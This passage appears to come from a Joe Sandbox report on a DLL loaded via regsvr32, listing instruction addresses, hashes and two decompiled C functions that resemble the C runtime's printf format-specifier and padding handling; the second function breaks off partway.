                                                                      0x18000d644
                                                                      0x18000d646
                                                                      0x18000d653
                                                                      0x18000d656
                                                                      0x18000d659
                                                                      0x18000d669
                                                                      0x18000d671
                                                                      0x18000d67d
                                                                      0x18000d68b
                                                                      0x18000d694
                                                                      0x18000d6ae
                                                                      0x18000d6b2
                                                                      0x18000d6b5
                                                                      0x18000d6ba
                                                                      0x18000d6c2
                                                                      0x18000d6c4
                                                                      0x18000d6c6
                                                                      0x18000d6cd
                                                                      0x18000d6d8
                                                                      0x18000d6de
                                                                      0x18000d6e8
                                                                      0x18000d6ed
                                                                      0x18000d6ff
                                                                      0x18000d70c
                                                                      0x18000d711
                                                                      0x18000d724
                                                                      0x18000d73f
                                                                      0x18000d749
                                                                      0x18000d75b
                                                                      0x18000d75d
                                                                      0x18000d760
                                                                      0x18000d762
                                                                      0x18000d769
                                                                      0x18000d77a
                                                                      0x18000d77c
                                                                      0x18000d782
                                                                      0x18000d791
                                                                      0x18000d7a1
                                                                      0x18000d7b3
                                                                      0x18000d7bc
                                                                      0x18000d7d6
                                                                      0x18000d7da
                                                                      0x18000d7dd
                                                                      0x18000d7e2
                                                                      0x18000d7ea
                                                                      0x18000d7ec
                                                                      0x18000d7ee
                                                                      0x18000d7f2
                                                                      0x18000d7f8
                                                                      0x18000d801
                                                                      0x18000d812
                                                                      0x18000d81b
                                                                      0x18000d81d
                                                                      0x18000d820
                                                                      0x18000d825
                                                                      0x18000d833
                                                                      0x18000d838
                                                                      0x18000d83d
                                                                      0x18000d86d

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6db5281e0a2533ee3620cded95cc5dd605ced6adf503bd7d06e93c46902267a4
                                                                      • Instruction ID: 0e24bc0dccd614153196d0530449c76fc22ab909efa3b4322107bf2ac12e65a9
                                                                      • Opcode Fuzzy Hash: 6db5281e0a2533ee3620cded95cc5dd605ced6adf503bd7d06e93c46902267a4
                                                                      • Instruction Fuzzy Hash: 3CE1AE3620064D86EBEADF19C0403EA77A1F748BD8F59D117AE4A473D5DE35CA8AC720
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E0000000118000F608(long long __rbx, long long __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t122;
                                                                      				void* _t125;
                                                                      				unsigned int _t166;
                                                                      				intOrPtr _t167;
                                                                      				unsigned int _t174;
                                                                      				signed char _t193;
                                                                      				void* _t196;
                                                                      				void* _t202;
                                                                      				signed long long _t271;
                                                                      				long long _t287;
                                                                      				intOrPtr* _t291;
                                                                      				intOrPtr* _t294;
                                                                      				signed int* _t308;
                                                                      				void* _t311;
                                                                      				void* _t315;
                                                                      				void* _t316;
                                                                      				void* _t330;
                                                                      				intOrPtr* _t332;
                                                                      
                                                                      				_t310 = __rsi;
                                                                      				_t307 = __rdi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t315 = _t316;
                                                                      				_t271 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t271 ^ _t316 - 0x00000050;
                                                                      				_t122 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t287 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				r14b = 0x58;
                                                                      				r15b = 0x41;
                                                                      				_t202 = _t122 - 0x64;
                                                                      				if (_t202 > 0) goto 0x8000f6ab;
                                                                      				if (_t202 == 0) goto 0x8000f70e;
                                                                      				if (_t122 == r15b) goto 0x8000f71b;
                                                                      				if (_t122 == 0x43) goto 0x8000f68e;
                                                                      				if (_t122 - 0x44 <= 0) goto 0x8000f724;
                                                                      				if (_t122 - 0x47 <= 0) goto 0x8000f71b;
                                                                      				if (_t122 == 0x53) goto 0x8000f6d0;
                                                                      				if (_t122 == r14b) goto 0x8000f6a1;
                                                                      				if (_t122 == 0x5a) goto 0x8000f69a;
                                                                      				if (_t122 == 0x61) goto 0x8000f71b;
                                                                      				if (_t122 != 0x63) goto 0x8000f724;
                                                                      				E0000000118000FA5C(_t122, _t122 - 0x63, __rcx, __rcx);
                                                                      				goto 0x8000f720;
                                                                      				E0000000118000FB68(__rcx);
                                                                      				goto 0x8000f720;
                                                                      				_t125 = E0000000118001C88C(r13b, _t196, __rcx, __rcx, __rdi, __rsi);
                                                                      				goto 0x8000f720;
                                                                      				if (_t125 - 0x67 <= 0) goto 0x8000f71b;
                                                                      				if (_t125 == 0x69) goto 0x8000f70e;
                                                                      				if (_t125 == 0x6e) goto 0x8000f707;
                                                                      				if (_t125 == 0x6f) goto 0x8000f6e7;
                                                                      				if (_t125 == 0x70) goto 0x8000f6d7;
                                                                      				if (_t125 == 0x73) goto 0x8000f6d0;
                                                                      				if (_t125 == 0x75) goto 0x8000f712;
                                                                      				if (_t125 != dil) goto 0x8000f724;
                                                                      				goto 0x8000f6a4;
                                                                      				E0000000118000FC10(__rcx, __rcx);
                                                                      				goto 0x8000f720;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8000f6a1;
                                                                      				_t166 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t166 >> 0x00000005) == 0) goto 0x8000f6fb;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t166;
                                                                      				E0000000118001CAB8(0, _t196, __rcx, __rcx, _t307, _t310);
                                                                      				goto 0x8000f720;
                                                                      				E0000000118000FFA8(__rcx);
                                                                      				goto 0x8000f720;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001CCE4(0, _t196, __rcx, __rcx, _t307, _t310);
                                                                      				goto 0x8000f720;
                                                                      				if (E0000000118000FCD4(0, r13b & _t166 >> 0x00000005, __rcx, __rcx, _t310, _t315) != 0) goto 0x8000f72b;
                                                                      				goto 0x8000fa27;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x8000f741;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x470)) == r13d) goto 0x8000fa24;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8000fa24;
                                                                      				_t193 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8000f78e;
                                                                      				if ((r13b & 0) == 0) goto 0x8000f773;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8000f78b;
                                                                      				if ((r13b & _t193) == 0) goto 0x8000f77e;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8000f78b;
                                                                      				if ((r13b & 0) == 0) goto 0x8000f78e;
                                                                      				_v72 = 0x20;
                                                                      				_t311 = _t330;
                                                                      				_t167 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((_t167 - r14b & 0x000000df) != 0) goto 0x8000f7a9;
                                                                      				if ((r13b & _t193 >> 0x00000005) == 0) goto 0x8000f7a9;
                                                                      				r8b = r13b;
                                                                      				goto 0x8000f7ac;
                                                                      				r8b = 0;
                                                                      				if (r8b != 0) goto 0x8000f7bf;
                                                                      				if ((_t167 - r15b & 0xffffff00 | (_t167 - r15b & 0x000000df) == 0x00000000) == 0) goto 0x8000f7da;
                                                                      				 *((char*)(_t315 + _t311 - 0x20)) = 0x30;
                                                                      				if (_t167 == r14b) goto 0x8000f7ce;
                                                                      				if (_t167 != r15b) goto 0x8000f7d1;
                                                                      				dil = r14b;
                                                                      				 *((intOrPtr*)(_t315 + _t311 - 0x1f)) = dil;
                                                                      				r15d =  *((intOrPtr*)(__rcx + 0x2c));
                                                                      				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				r15d = r15d;
                                                                      				if ((_t193 & 0x0000000c) != 0) goto 0x8000f84a;
                                                                      				if (r15d <= 0) goto 0x8000f84a;
                                                                      				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8000f815;
                                                                      				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x8000f82e;
                                                                      				if (E0000000118003EF10(0x20,  *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)),  *((intOrPtr*)(__rcx + 0x460))) == 0xffffffff) goto 0x8000f846;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8000f84a;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8000f7f5;
                                                                      				goto 0x8000f84a;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
                                                                      				_t62 = _t287 + 0x460; // 0x4a1
                                                                      				_t332 = _t62;
                                                                      				_t63 = _t287 + 0x20; // 0x61
                                                                      				_t308 = _t63;
                                                                      				if ((r13b &  *( *_t332 + 0x14) >> 0x0000000c) == 0) goto 0x8000f875;
                                                                      				if ( *((long long*)( *_t332 + 8)) != 0) goto 0x8000f875;
                                                                      				 *_t308 =  *_t308;
                                                                      				goto 0x8000f88c;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t69 =  &_v72; // -31
                                                                      				r8d = 0;
                                                                      				_t291 = _t332;
                                                                      				E00000001180008438(__rcx, _t291, _t69, _t311 + 2, _t315, _t308);
                                                                      				_t174 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t174 >> 0x00000003) == 0) goto 0x8000f8f2;
                                                                      				if ((r13b & _t174 >> 0x00000002) != 0) goto 0x8000f8f2;
                                                                      				if (r15d <= 0) goto 0x8000f8f2;
                                                                      				if ((r13b &  *( *_t332 + 0x14) >> 0x0000000c) == 0) goto 0x8000f8c4;
                                                                      				if ( *((long long*)( *_t332 + 8)) == 0) goto 0x8000f8d9;
                                                                      				if (E0000000118003EF10(0x30,  *((long long*)( *_t332 + 8)),  *_t332) == 0xffffffff) goto 0x8000f8ef;
                                                                      				 *_t308 = _t291 + 1;
                                                                      				if ( *_t308 == 0xfffffffe) goto 0x8000f8f2;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8000f8ac;
                                                                      				goto 0x8000f8f2;
                                                                      				 *_t308 =  *_t308 | 0xffffffff;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8000f987;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8000f987;
                                                                      				_t85 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t86 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E0000000118003E4FC( *((intOrPtr*)(__rcx + 8)), __rcx, _t86, _t85, _t315,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x8000f982;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8000f982;
                                                                      				if ((r13b &  *( *_t332 + 0x14) >> 0x0000000c) == 0) goto 0x8000f964;
                                                                      				if ( *((long long*)( *_t332 + 8)) != 0) goto 0x8000f964;
                                                                      				 *_t308 =  *_t308 + r8d;
                                                                      				goto 0x8000f978;
                                                                      				_v88 =  *((intOrPtr*)(_t287 + 8));
                                                                      				_t98 =  &_v68; // -27
                                                                      				E00000001180008438(_t287, _t332, _t98, _t311 + 2, _t315, _t308);
                                                                      				if (0 + r13d !=  *(_t287 + 0x48)) goto 0x8000f90c;
                                                                      				goto 0x8000f9c3;
                                                                      				 *_t308 =  *_t308 | 0xffffffff;
                                                                      				goto 0x8000f9c3;
                                                                      				r8d =  *(_t287 + 0x48);
                                                                      				if ((r13b &  *( *_t332 + 0x14) >> 0x0000000c) == 0) goto 0x8000f9b0;
                                                                      				if ( *((long long*)( *_t332 + 8)) != 0) goto 0x8000f9b0;
                                                                      				 *_t308 =  *_t308 + r8d;
                                                                      				goto 0x8000f9c3;
                                                                      				_v88 =  *((intOrPtr*)(_t287 + 8));
                                                                      				_t294 = _t332;
                                                                      				E00000001180008438(_t287, _t294,  *((intOrPtr*)(_t287 + 0x40)), _t311 + 2, _t315, _t308);
                                                                      				if ( *_t308 < 0) goto 0x8000fa24;
                                                                      				if ((r13b &  *(_t287 + 0x28) >> 0x00000002) == 0) goto 0x8000fa24;
                                                                      				if (r15d <= 0) goto 0x8000fa24;
                                                                      				if ((r13b &  *( *_t332 + 0x14) >> 0x0000000c) == 0) goto 0x8000f9f6;
                                                                      				if ( *((long long*)( *_t332 + 8)) == 0) goto 0x8000fa0b;
                                                                      				if (E0000000118003EF10(0x20,  *((long long*)( *_t332 + 8)),  *_t332) == 0xffffffff) goto 0x8000fa21;
                                                                      				 *_t308 = _t294 + 1;
                                                                      				if ( *_t308 == 0xfffffffe) goto 0x8000fa24;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8000f9de;
                                                                      				goto 0x8000fa24;
                                                                      				 *_t308 =  *_t308 | 0xffffffff;
                                                                      				return E00000001180002FB0(r13b,  *_t308, _v56 ^ _t316 - 0x00000050);
                                                                      			}




























                                                                      0x18000f608
                                                                      0x18000f608
                                                                      0x18000f608
                                                                      0x18000f60d
                                                                      0x18000f612
                                                                      0x18000f620
                                                                      0x18000f627
                                                                      0x18000f631
                                                                      0x18000f635
                                                                      0x18000f638
                                                                      0x18000f63b
                                                                      0x18000f641
                                                                      0x18000f644
                                                                      0x18000f647
                                                                      0x18000f64a
                                                                      0x18000f64c
                                                                      0x18000f64e
                                                                      0x18000f657
                                                                      0x18000f65f
                                                                      0x18000f663
                                                                      0x18000f66b
                                                                      0x18000f673
                                                                      0x18000f678
                                                                      0x18000f67c
                                                                      0x18000f680
                                                                      0x18000f688
                                                                      0x18000f690
                                                                      0x18000f695
                                                                      0x18000f69a
                                                                      0x18000f69f
                                                                      0x18000f6a4
                                                                      0x18000f6a9
                                                                      0x18000f6ad
                                                                      0x18000f6b1
                                                                      0x18000f6b5
                                                                      0x18000f6b9
                                                                      0x18000f6bd
                                                                      0x18000f6c1
                                                                      0x18000f6c5
                                                                      0x18000f6ca
                                                                      0x18000f6ce
                                                                      0x18000f6d0
                                                                      0x18000f6d5
                                                                      0x18000f6d7
                                                                      0x18000f6de
                                                                      0x18000f6e5
                                                                      0x18000f6e7
                                                                      0x18000f6f2
                                                                      0x18000f6f4
                                                                      0x18000f6f8
                                                                      0x18000f700
                                                                      0x18000f705
                                                                      0x18000f707
                                                                      0x18000f70c
                                                                      0x18000f70e
                                                                      0x18000f714
                                                                      0x18000f719
                                                                      0x18000f722
                                                                      0x18000f726
                                                                      0x18000f732
                                                                      0x18000f73b
                                                                      0x18000f745
                                                                      0x18000f74b
                                                                      0x18000f750
                                                                      0x18000f756
                                                                      0x18000f761
                                                                      0x18000f76b
                                                                      0x18000f76d
                                                                      0x18000f771
                                                                      0x18000f776
                                                                      0x18000f778
                                                                      0x18000f77c
                                                                      0x18000f785
                                                                      0x18000f787
                                                                      0x18000f78b
                                                                      0x18000f78e
                                                                      0x18000f798
                                                                      0x18000f7a2
                                                                      0x18000f7a4
                                                                      0x18000f7a7
                                                                      0x18000f7a9
                                                                      0x18000f7b9
                                                                      0x18000f7bd
                                                                      0x18000f7bf
                                                                      0x18000f7c7
                                                                      0x18000f7cc
                                                                      0x18000f7ce
                                                                      0x18000f7d1
                                                                      0x18000f7da
                                                                      0x18000f7de
                                                                      0x18000f7e2
                                                                      0x18000f7e8
                                                                      0x18000f7f3
                                                                      0x18000f805
                                                                      0x18000f813
                                                                      0x18000f82c
                                                                      0x18000f834
                                                                      0x18000f83a
                                                                      0x18000f842
                                                                      0x18000f844
                                                                      0x18000f846
                                                                      0x18000f84e
                                                                      0x18000f84e
                                                                      0x18000f858
                                                                      0x18000f858
                                                                      0x18000f865
                                                                      0x18000f86f
                                                                      0x18000f871
                                                                      0x18000f873
                                                                      0x18000f875
                                                                      0x18000f87d
                                                                      0x18000f881
                                                                      0x18000f884
                                                                      0x18000f887
                                                                      0x18000f88c
                                                                      0x18000f897
                                                                      0x18000f89f
                                                                      0x18000f8aa
                                                                      0x18000f8b8
                                                                      0x18000f8c2
                                                                      0x18000f8d7
                                                                      0x18000f8de
                                                                      0x18000f8e3
                                                                      0x18000f8eb
                                                                      0x18000f8ed
                                                                      0x18000f8ef
                                                                      0x18000f8f6
                                                                      0x18000f900
                                                                      0x18000f910
                                                                      0x18000f914
                                                                      0x18000f919
                                                                      0x18000f91d
                                                                      0x18000f926
                                                                      0x18000f92c
                                                                      0x18000f938
                                                                      0x18000f93a
                                                                      0x18000f941
                                                                      0x18000f953
                                                                      0x18000f95d
                                                                      0x18000f95f
                                                                      0x18000f962
                                                                      0x18000f964
                                                                      0x18000f96c
                                                                      0x18000f973
                                                                      0x18000f97e
                                                                      0x18000f980
                                                                      0x18000f982
                                                                      0x18000f985
                                                                      0x18000f98e
                                                                      0x18000f99f
                                                                      0x18000f9a9
                                                                      0x18000f9ab
                                                                      0x18000f9ae
                                                                      0x18000f9b0
                                                                      0x18000f9bb
                                                                      0x18000f9be
                                                                      0x18000f9c6
                                                                      0x18000f9d1
                                                                      0x18000f9dc
                                                                      0x18000f9ea
                                                                      0x18000f9f4
                                                                      0x18000fa09
                                                                      0x18000fa10
                                                                      0x18000fa15
                                                                      0x18000fa1d
                                                                      0x18000fa1f
                                                                      0x18000fa21
                                                                      0x18000fa50

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 51b80536b0e6b15803645fbae310d893953b4cb89ebf16a0f738b7cfd2b50859
                                                                      • Instruction ID: ccfd0359eab0f5eda31aedafcc81ff7672e2b648fb51259d3d2e593c613c1af3
                                                                      • Opcode Fuzzy Hash: 51b80536b0e6b15803645fbae310d893953b4cb89ebf16a0f738b7cfd2b50859
                                                                      • Instruction Fuzzy Hash: 60E1B07260464886EBFACA2981443FD37A1E74DBD8F14C225EE4947BD5CF31CA4AE742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E00000001180009070(long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t120;
                                                                      				void* _t123;
                                                                      				unsigned int _t164;
                                                                      				signed char _t165;
                                                                      				unsigned int _t172;
                                                                      				intOrPtr _t191;
                                                                      				void* _t199;
                                                                      				signed long long _t266;
                                                                      				void* _t282;
                                                                      				intOrPtr* _t286;
                                                                      				intOrPtr* _t289;
                                                                      				signed int* _t303;
                                                                      				void* _t306;
                                                                      				void* _t310;
                                                                      				void* _t311;
                                                                      				void* _t325;
                                                                      				intOrPtr* _t327;
                                                                      
                                                                      				_t305 = __rsi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t310 = _t311;
                                                                      				_t266 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t266 ^ _t311 - 0x00000050;
                                                                      				_t120 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t282 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				r14b = 0x58;
                                                                      				r15b = 0x41;
                                                                      				_t199 = _t120 - 0x64;
                                                                      				if (_t199 > 0) goto 0x80009113;
                                                                      				if (_t199 == 0) goto 0x80009176;
                                                                      				if (_t120 == r15b) goto 0x80009183;
                                                                      				if (_t120 == 0x43) goto 0x800090f6;
                                                                      				if (_t120 - 0x44 <= 0) goto 0x8000918c;
                                                                      				if (_t120 - 0x47 <= 0) goto 0x80009183;
                                                                      				if (_t120 == 0x53) goto 0x80009138;
                                                                      				if (_t120 == r14b) goto 0x80009109;
                                                                      				if (_t120 == 0x5a) goto 0x80009102;
                                                                      				if (_t120 == 0x61) goto 0x80009183;
                                                                      				if (_t120 != 0x63) goto 0x8000918c;
                                                                      				E000000011800094AC(_t120, _t120 - 0x63, __rcx);
                                                                      				goto 0x80009188;
                                                                      				E00000001180009570(__rcx);
                                                                      				goto 0x80009188;
                                                                      				_t123 = E0000000118001E424(r13b, __rcx, __rcx, __rsi, _t310);
                                                                      				goto 0x80009188;
                                                                      				if (_t123 - 0x67 <= 0) goto 0x80009183;
                                                                      				if (_t123 == 0x69) goto 0x80009176;
                                                                      				if (_t123 == 0x6e) goto 0x8000916f;
                                                                      				if (_t123 == 0x6f) goto 0x8000914f;
                                                                      				if (_t123 == 0x70) goto 0x8000913f;
                                                                      				if (_t123 == 0x73) goto 0x80009138;
                                                                      				if (_t123 == 0x75) goto 0x8000917a;
                                                                      				if (_t123 != dil) goto 0x8000918c;
                                                                      				goto 0x8000910c;
                                                                      				E000000011800095E8(__rcx);
                                                                      				goto 0x80009188;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x80009109;
                                                                      				_t164 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t164 >> 0x00000005) == 0) goto 0x80009163;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t164;
                                                                      				E0000000118001E60C(0, __rcx, __rcx, _t305, _t310);
                                                                      				goto 0x80009188;
                                                                      				E00000001180009930(__rcx, __rcx);
                                                                      				goto 0x80009188;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001E7F4(0, __rcx, __rcx, _t305, _t310);
                                                                      				goto 0x80009188;
                                                                      				if (E0000000118000968C(0, __rcx, __rcx, _t305, _t310) != 0) goto 0x80009193;
                                                                      				goto 0x80009479;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x80009476;
                                                                      				_t165 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x800091e0;
                                                                      				if ((r13b & 0) == 0) goto 0x800091c5;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x800091dd;
                                                                      				if ((r13b & _t165) == 0) goto 0x800091d0;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x800091dd;
                                                                      				if ((r13b & 0) == 0) goto 0x800091e0;
                                                                      				_v72 = 0x20;
                                                                      				_t306 = _t325;
                                                                      				_t191 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((_t191 - r14b & 0x000000df) != 0) goto 0x800091fb;
                                                                      				if ((r13b & _t165 >> 0x00000005) == 0) goto 0x800091fb;
                                                                      				r8b = r13b;
                                                                      				goto 0x800091fe;
                                                                      				r8b = 0;
                                                                      				if (r8b != 0) goto 0x80009211;
                                                                      				if ((_t191 - r15b & 0xffffff00 | (_t191 - r15b & 0x000000df) == 0x00000000) == 0) goto 0x8000922c;
                                                                      				 *((char*)(_t310 + _t306 - 0x20)) = 0x30;
                                                                      				if (_t191 == r14b) goto 0x80009220;
                                                                      				if (_t191 != r15b) goto 0x80009223;
                                                                      				dil = r14b;
                                                                      				 *((intOrPtr*)(_t310 + _t306 - 0x1f)) = dil;
                                                                      				r15d =  *((intOrPtr*)(__rcx + 0x2c));
                                                                      				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				r15d = r15d;
                                                                      				if ((_t165 & 0x0000000c) != 0) goto 0x8000929c;
                                                                      				if (r15d <= 0) goto 0x8000929c;
                                                                      				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x80009267;
                                                                      				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x80009280;
                                                                      				if (E0000000118003EF10(0x20,  *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)),  *((intOrPtr*)(__rcx + 0x460))) == 0xffffffff) goto 0x80009298;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8000929c;
                                                                      				if (0 + r13d - r15d < 0) goto 0x80009247;
                                                                      				goto 0x8000929c;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
                                                                      				_t60 = _t282 + 0x460; // 0x4a1
                                                                      				_t327 = _t60;
                                                                      				_t61 = _t282 + 0x20; // 0x61
                                                                      				_t303 = _t61;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x800092c7;
                                                                      				if ( *((long long*)( *_t327 + 8)) != 0) goto 0x800092c7;
                                                                      				 *_t303 =  *_t303;
                                                                      				goto 0x800092de;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t67 =  &_v72; // -31
                                                                      				r8d = 0;
                                                                      				_t286 = _t327;
                                                                      				E00000001180008438(__rcx, _t286, _t67, _t306 + 2, _t310, _t303);
                                                                      				_t172 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t172 >> 0x00000003) == 0) goto 0x80009344;
                                                                      				if ((r13b & _t172 >> 0x00000002) != 0) goto 0x80009344;
                                                                      				if (r15d <= 0) goto 0x80009344;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x80009316;
                                                                      				if ( *((long long*)( *_t327 + 8)) == 0) goto 0x8000932b;
                                                                      				if (E0000000118003EF10(0x30,  *((long long*)( *_t327 + 8)),  *_t327) == 0xffffffff) goto 0x80009341;
                                                                      				 *_t303 = _t286 + 1;
                                                                      				if ( *_t303 == 0xfffffffe) goto 0x80009344;
                                                                      				if (0 + r13d - r15d < 0) goto 0x800092fe;
                                                                      				goto 0x80009344;
                                                                      				 *_t303 =  *_t303 | 0xffffffff;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x800093d9;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x800093d9;
                                                                      				_t83 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t84 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E0000000118003E4FC( *((intOrPtr*)(__rcx + 8)), __rcx, _t84, _t83, _t310,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x800093d4;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x800093d4;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x800093b6;
                                                                      				if ( *((long long*)( *_t327 + 8)) != 0) goto 0x800093b6;
                                                                      				 *_t303 =  *_t303 + r8d;
                                                                      				goto 0x800093ca;
                                                                      				_v88 =  *((intOrPtr*)(_t282 + 8));
                                                                      				_t96 =  &_v68; // -27
                                                                      				E00000001180008438(_t282, _t327, _t96, _t306 + 2, _t310, _t303);
                                                                      				if (0 + r13d !=  *(_t282 + 0x48)) goto 0x8000935e;
                                                                      				goto 0x80009415;
                                                                      				 *_t303 =  *_t303 | 0xffffffff;
                                                                      				goto 0x80009415;
                                                                      				r8d =  *(_t282 + 0x48);
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x80009402;
                                                                      				if ( *((long long*)( *_t327 + 8)) != 0) goto 0x80009402;
